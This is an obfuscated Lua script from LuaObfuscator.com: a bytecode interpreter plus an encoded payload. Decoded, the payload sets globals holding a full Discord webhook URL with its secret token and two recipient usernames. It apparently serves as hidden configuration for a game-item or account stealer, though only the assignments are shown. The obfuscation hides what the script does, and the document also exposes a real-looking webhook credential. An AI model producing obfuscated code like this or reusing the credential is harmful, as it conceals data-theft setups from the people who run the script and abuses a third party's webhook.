--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v85=(v31/(2^(v32-((2 + 0) -1))))%((5 -3)^(((v33-(1 + 0)) -(v32-(1 -0))) + (2 -1))) ;return v85-(v85%(1638 -(1523 + 114))) ;else local v86=619 -(555 + 64) ;local v87;while true do if (v86==(931 -(857 + 17 + 57))) then v87=(570 -(367 + 201))^(v32-(1271 -((1183 -(892 + 65)) + 1044))) ;return (((v31%(v87 + v87))>=v87) and (4 -3)) or (117 -(32 + 85)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + ((6 + 1) -4) );v19=v19 + (6 -2) ;return (v37 * (30800116 -(34428522 -20405622))) + (v36 * (65886 -(87 + 263))) + (v35 * (436 -(67 + 113))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v38==(1850 -(1409 + 441))) then v39=0;v40=nil;v38=1 + 0 ;end if (v38~=(1 + 1)) then else v43=nil;v44=nil;v38=721 -(15 + 703) ;end if (v38==(1 + 0)) then v41=nil;v42=nil;v38=2;end if (v38~=(441 -(262 + 176))) then else v45=nil;v46=nil;v38=1773 -(1749 + 20) ;end if ((1725 -(345 + 1376))==v38) then v47=nil;while true do if (v39==(1 + 1)) then local v100=688 -(198 + 490) ;while true do if ((4 -3)==v100) then v39=2 + 1 ;break;end if (v100~=(0 -0)) then else v44=nil;v45=nil;v100=1207 -(696 + 510) ;end end end if (v39~=(5 -2)) then else v46=nil;v47=nil;v39=4;end if (v39==(2 -1)) then local v101=0;while true do if (v101==1) then v39=2;break;end if (v101~=(1262 -(1091 + 171))) then else v42=nil;v43=nil;v101=1 + 0 ;end end end if (v39==(2 + 2)) then while true do if (3~=v40) then else v47=nil;while true do local v117=0 -0 ;local v118;while true do if (v117==(0 -0)) then v118=374 -(123 + 251) ;while true do if (v118~=(4 -3)) then else if ((698 -(208 + 490))==v41) then local v120=0;local v121;while true do if (v120~=(0 + 0)) then else v121=0 + 0 ;while true do if (v121==(116 -(4 + 110))) then v41=1;break;end if (v121==(836 -(660 + 176))) then local v126=0;while true do if (v126==(1427 -(41 + 1386))) then local v141=103 -(17 + 86) ;while true do if (v141==(0 + 0)) then v42={};v43={};v141=203 -(14 + 188) ;end if (v141==(676 -(534 + 141))) then v126=1 -0 ;break;end end end if (1~=v126) then else v121=1 + 0 ;break;end end end if (v121==(1 + 0)) then local v127=0;while true do if (v127==(1 + 0)) then v121=3 -1 ;break;end if ((0 -0)==v127) then v44={};v45={v42,v43,nil,v44};v127=1;end end end end break;end end end break;end if (v118~=0) then else if (v41~=2) then else local v122=0 + 0 ;while true do local v125=0 -0 ;while true do if (v125==0) then if (v122~=(65 -(30 + 35))) then else for v130=1 + 0 ,v24() do local v131=1257 -(1043 + 214) ;local v132;local v133;while true do if (v131==0) then v132=0;v133=nil;v131=3 -2 ;end if (v131==(1 + 0)) then while true do if (v132~=(0 + 0)) then else v133=v22();if (v21(v133,1,1)==(396 -(115 + 281))) then local v144=0 -0 ;local v145;local v146;local v147;local v148;while true do if (v144==1) then v147=nil;v148=nil;v144=2;end if (v144~=(0 -0)) then else v145=0 + 0 ;v146=nil;v144=2 -1 ;end if (v144==(322 -(53 + 267))) then while true do if (v145==(10 -7)) then if (v21(v147,1 + 2 ,870 -(550 + 317) )==(1 -0)) then v148[986 -(18 + 964) ]=v47[v148[4]];end v42[v130]=v148;break;end if (v145==0) then local v150=0 -0 ;local v151;while true do if (v150==(0 -0)) then v151=0;while true do if (v151==1) then v145=2 -1 ;break;end if (v151==(285 -(134 + 151))) then v146=v21(v133,2,1668 -(970 + 695) );v147=v21(v133,7 -3 ,6);v151=1;end end break;end end end if (v145==(2 + 0)) then if (v21(v147,851 -(20 + 830) ,1 + 0 )==(1991 -(582 + 1408))) then v148[6 -4 ]=v47[v148[2 -0 ]];end if (v21(v147,1 + 1 ,7 -5 )~=(1825 -(1195 + 629))) then else v148[6 -3 ]=v47[v148[3 -0 ]];end v145=3;end if (v145==(242 -(187 + 54))) then local v152=0;while true do if (v152==1) then v145=1 + 1 ;break;end if (v152~=(780 -(162 + 618))) then else v148={v23(),v23(),nil,nil};if (v146==0) then local v159=0;local v160;while true do if (v159==(1551 -(1126 + 425))) then v160=405 -(118 + 287) ;while true do if (v160==0) then v148[3 + 0 ]=v23();v148[3 + 1 ]=v23();break;end end break;end end elseif (v146==(1 -0)) then v148[4 -1 ]=v24();elseif (v146==(1 + 1)) then v148[1639 -(1373 + 263) ]=v24() -((1002 -(451 + 549))^(6 + 10)) ;elseif (v146==(4 -1)) then local v165=0;local v166;while true do if (v165~=(0 -0)) then else v166=1384 -(746 + 638) ;while true do if ((0 -0)~=v166) then else v148[2 + 1 ]=v24() -(2^(23 -7)) ;v148[4]=v23();break;end end break;end end end v152=1;end end end end break;end end end break;end end break;end end end for v134=342 -(218 + 123) ,v24() do v43[v134-1 ]=v29();end v122=1;end if (v122~=1) then else return v45;end break;end end end end if ((978 -(553 + 424))==v41) then local v123=1581 -(1535 + 46) ;local v124;while true do if (v123==(0 + 0)) then v124=0 + 0 ;while true do if (v124~=1) then else for v136=1 + 0 ,v46 do local v137=0 + 0 ;local v138;local v139;local v140;while true do if (v137~=(1 + 0)) then else v140=nil;while true do if (v138~=(0 + 0)) then else local v142=0 -0 ;while true do if (v142~=(560 -(306 + 254))) then else v139=v22();v140=nil;v142=1 + 0 ;end if (v142~=(1 -0)) then else v138=4 -3 ;break;end end end if (v138==(1468 -(899 + 568))) then if (v139==(1 + 0)) then v140=v22()~=(0 -0) ;elseif (v139==(605 -(268 + 335))) then v140=v25();elseif (v139~=(293 -(60 + 230))) then else v140=v26();end v47[v136]=v140;break;end end break;end if (v137==0) then v138=0;v139=nil;v137=573 -(426 + 146) ;end end end v45[3]=v22();v124=1 + 1 ;end if (v124~=(1458 -(282 + 1174))) then else v41=2 + 0 ;break;end if ((811 -(569 + 242))==v124) then local v129=0 -0 ;while true do if (v129==(0 -0)) then v46=v24();v47={};v129=1;end if (v129==(1 + 0)) then v124=1025 -(706 + 318) ;break;end end end end break;end end end v118=1252 -(721 + 530) ;end end break;end end end break;end if (v40==(1271 -(945 + 326))) then v41=0 -0 ;v42=nil;v40=1 + 0 ;end if ((701 -(271 + 429))==v40) then local v115=0 + 0 ;while true do if (v115~=1) then else v40=733 -(476 + 255) ;break;end if (v115~=(1130 -(369 + 761))) then else v43=nil;v44=nil;v115=1 + 0 ;end end end if (v40==2) then local v116=0;while true do if ((0 -0)~=v116) then else v45=nil;v46=nil;v116=1;end if (v116==(1501 -(1408 + 92))) then v40=1089 -(461 + 625) ;break;end end end end break;end if (v39~=(1288 -(993 + 295))) then else v40=0 + 0 ;v41=nil;v39=1172 -(418 + 753) ;end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=1 + 0 ;local v51=(v21(v49,1 -0 ,356 -((433 -289) + 192) ) * (((522 -(244 + 60)) -(42 + 174))^(25 + 7))) + v48 ;local v52=v21(v49,18 + 3 ,31);local v53=((v21(v49,14 + 18 )==(1505 -(363 + 1141))) and  -((2057 -(41 + 435)) -(1183 + 397))) or 1 ;if (v52==(0 -0)) then if (v51==(1001 -(938 + 63))) then return v53 * (0 + 0) ;else local v93=0 + 0 ;while true do if (v93==(1975 -(1913 + 48 + 14))) then v52=1 + 0 ;v50=(0 + 0) -(1125 -(936 + 189)) ;break;end end end elseif (v52==(3980 -(565 + 1368))) then return ((v51==(0 -(0 + 0))) and (v53 * ((1662 -(1477 + 184))/(0 -(1613 -(1565 + 48)))))) or (v53 * NaN) ;end return v8(v53,v52-(954 + 43 + 26) ) * (v50 + (v51/((858 -(564 + 292))^(89 -37)))) ;end v26=nil;function v26(v54)local v55;if  not v54 then local v88=1138 -(635 + 147 + 356) ;while true do if (v88==(267 -(176 + 91))) then v54=v24();if (v54==(1092 -(975 + 117))) then return "";end break;end end end v55=v3(v16,v19,(v19 + v54) -((6659 -4783) -(157 + (5873 -4155))) );v19=v19 + v54 ;local v56={};for v69=(1020 -(697 + 321)) -1 , #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=0 -0 ;local v58;while true do if (v57==1) then return v58;end if (v57==(0 -0)) then v58=v1(v16,v19,v19);v19=v19 + (2 -1) ;v57=1;end end end v23=nil;function v23()local v59=0;local v60;local v61;while true do if (v59==1) then return (v61 * (100 + 156)) + v60 ;end if (v59==(0 -0)) then v60,v61=v1(v16,v19,v19 + (5 -3) );v19=v19 + (1229 -(322 + (2094 -(449 + 740)))) ;v59=612 -(602 + 9) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then v20=v0(v3(v62,1,1));return "";else local v89=v2(v0(v62,16));if v20 then local v94=0;local v95;while true do if (v94==1) then return v95;end if (v94==0) then v95=v5(v89,v20);v20=nil;v94=1;end end else return v89;end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v71=v66;local v72=v67;local v73=v68;local v74=v28;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v90=0,v79 do if (v90>=v73) then v77[v90-v73 ]=v78[v90 + 1 ];else v81[v90]=v78[v90 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1];if (v84<=2) then if (v84<=0) then v81[v83[2]]=v83[3];elseif (v84>1) then v81[v83[2]][v83[3]]=v83[4];else v81[v83[2]]=v65[v83[3]];end elseif (v84<=4) then if (v84==3) then v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v65[v83[3]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v75=v83[3];else do return;end end elseif (v84==5) then v75=v83[3];elseif (v81[v83[2]]==v83[4]) then v75=v75 + 1 ;else v75=v83[3];end v75=v75 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!093O00028O00026O00F03F03023O005F4703073O00576562682O6F6B037B3O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31323432383034373331323839363034302F5A386944564C683673462D6657637076626D7A7879666C30776D6173766F3442745474473876444D4B744F32394D774B51746974474950755968614250733176654E4D332O2003083O00557365724E616D65030F3O00736B6174617331323334353637382003093O00557365724E616D6532030C3O002057686F735F636872697320000F3O00124O00013O0026063O0006000100020004053O00060001001201000100033O0030020001000400050004053O000E00010026063O0001000100010004053O00010001001201000100033O00300300010006000700122O000100033O00302O00010008000900124O00023O00044O000100012O00043O00017O00",v9(),...);end
